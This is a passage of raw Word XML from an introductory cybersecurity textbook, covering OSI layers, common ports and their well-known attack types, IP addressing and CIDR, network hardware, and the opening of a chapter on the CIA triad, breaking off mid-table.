            <w:tcW w:type="dxa" w:w="29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winget / Chocolatey</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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apt / pacman / yum</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Registry</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 central config database</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 config in text files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Kernel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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NT Kernel (closed source)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Linux Kernel (open source)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Security Tools</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Defender, BitLocker</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SELinux, AppArmor, iptables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Pentesting Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Target in most corporate networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Primary attack platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Real-world networks are almost always a mix. A typical corporate environment runs Windows on desktops, Linux on servers, and has both as virtual machines. You need to be fluent in both.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 2: Networking Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Networking is the heart of cybersecurity. Every attack travels over a network. Every defense monitors a network. If you don't understand networking deeply, you can't do security work effectively.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 The OSI Model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The OSI (Open Systems Interconnection) model is a conceptual framework that divides network communication into 7 layers. Every security professional must know this cold.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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800"/>
        <w:gridCol w:w="3000"/>
        <w:gridCol w:w="3840"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Layer #</w:t>
            </w:r>
          </w:p>
        </w:tc>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38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Security Relevance</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Application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User-facing protocols (HTTP, DNS, FTP)</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 app attacks, phishing, malware C2</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6</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Presentation</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Data formatting, encryption, compression</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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SSL/TLS happens here</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Session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Establishes/maintains connections</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Session hijacking, replay attacks</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Transport</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Reliable delivery, ports (TCP/UDP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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Port scanning, firewall rules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Network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IP addressing and routing</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IP spoofing, routing attacks</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Data Link</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Frame delivery, MAC addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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ARP poisoning, VLAN hopping</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Physical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Raw bits over cable/wireless</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Physical taps, signal jamming</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E65100" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MEMORY TRICK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF3E0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Please Do Not Throw Sausage Pizza Away (layers 1-7) or All People Seem To Need Data Processing (layers 7-1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Data Link Layer (Layer 2) is responsible for determining frame boundaries. When Ethernet sends data, it wraps it in frames with a Start Frame Delimiter marking where data begins and a Frame Check Sequence at the end for error verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 TCP/IP and Protocols</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In practice, most networking uses the TCP/IP model. These are the protocols you'll work with daily:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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080"/>
        <w:gridCol w:w="3000"/>
        <w:gridCol w:w="3840"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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Port(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>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8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Security Notes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 traffic (unencrypted)</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Intercept with MITM, credentials in plaintext</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HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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443</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Web traffic (encrypted)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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Decrypt with proxy (Burp Suite)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FTP</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File transfer (unencrypted)</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Credentials in plaintext, often anonymous login</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SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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22</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Secure remote shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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Brute force target, key-based auth preferred</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Telnet</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Remote shell (unencrypted)</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Legacy, credentials in plaintext, avoid</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DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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53</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Domain name resolution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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DNS poisoning, zone transfer attacks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SMTP</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 sending</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Phishing infrastructure, open relay abuse</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SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445, 139</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Windows file sharing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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EternalBlue (MS17-010), pass-the-hash</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RDP</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3389</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Windows remote desktop</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BlueKeep, brute force, credential stuffing</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SNMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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161</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Network device management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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Community string enumeration</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LDAP</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389</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Directory services (Active Directory)</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Credential attacks, enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 IP Addressing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding IP addressing is fundamental to network security work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IPv4: 32-bit addresses in dotted decimal format (e.g., 192.168.1.1). About 4.3 billion possible addresses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IPv6: 128-bit addresses in hex format (e.g., 2001:0db8:85a3::8a2e:0370:7334). Effectively unlimited addresses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Private ranges (not routable on public internet): 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Subnet mask: Defines network vs host portion of an address (e.g., /24 = 255.255.255.0 = 256 addresses)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CIDR Notation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.0/24  = 256 addresses (192.168.1.0 - 192.168.1.255)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.0/25  = 128 addresses (192.168.1.0 - 192.168.1.127)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.0.0/8      = 16,777,216 addresses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 Network Hardware in Practice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Real networks use physical hardware. Here's what you'll encounter:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch: Layer 2 device. Connects devices within a LAN using MAC addresses. Creates separate collision domains.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Router: Layer 3 device. Routes packets between networks using IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Firewall: Filters traffic based on rules. Stateful firewalls track connection state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WAP (Wireless Access Point): Bridges wired and wireless networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Load Balancer: Distributes traffic across multiple servers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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2E5F8A" w:sz="4"/>
              <w:left w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:right w:val="single" w:color="2E5F8A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="2E5F8A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HOME LAB NOTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:left w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:right w:val="single" w:color="2E5F8A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="D5E8F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">A basic TP-Link switch and a spare router are all you need to build a home network lab. Segment your attack environment from your personal network using VLANs or physical separation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 3: The CIA Triad and Security Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Before attacking or defending anything, you need to understand what you're trying to protect - and what you're trying to break. The CIA Triad is the foundation of all information security thinking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 The CIA Triad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every security decision you make can be evaluated through three lenses:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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230"/>
        <w:gridCol w:w="243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Pillar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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223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Attack Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Defense Example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Confidentiality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Only authorized people see the data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Eavesdropping, data exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
